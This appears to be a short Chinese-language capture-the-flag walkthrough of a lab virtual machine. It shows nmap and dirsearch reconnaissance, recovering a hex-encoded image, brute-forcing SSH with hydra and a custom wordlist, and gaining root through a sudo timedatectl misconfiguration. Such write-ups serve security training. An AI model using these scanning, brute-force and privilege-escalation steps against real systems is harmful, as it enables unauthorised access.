一、信息收集
1、查看靶机的mac地址:
2、扫描靶机的ip:
nmap 192.168.13.0/24
3、扫描靶机的端口:
nmap -p- 192.168.13.146
4、访问靶机的80端口:
5、页面没有功能点,扫描一下靶机目录查看是否有有效信息:
dirsearch -u "http://192.168.13.146"
可以看到目录也没有太有用的信息,都是页面展示出来的路径
6、查看README.md文件,是一个十六进制文件,查看开头,可能是一个图片:
7、在kali里面下载文件并修改后缀为jpeg:
mv README.md README.jpeg
xdg-open README.jpeg
8、发现不能查看:
9、将十六进制文件转换为二进制文件进行查看:
xxd -r -ps README.jpeg > README.bin
strings README.bin
10、经过查看,确实是jpeg文件,将文件修改名字进行查看:
mv README.bin README1.jpeg
11、制作一个手工字典爆破图片中的信息:
12、爆出来ssh账号和密码:
hydra -L /home/kali/passwd.txt -P /home/kali/passwd.txt -t 10 -vV -e ns 192.168.13.146 ssh -f
13、使用账号和密码进行登录:
通过查看发现用户权限较低
二、提权
1、查看是否有sudo提权的权限:
sudo -l
2、发现有文件,使用sudo timedatectl list-timezones提权:
发现已经成功提到root用户了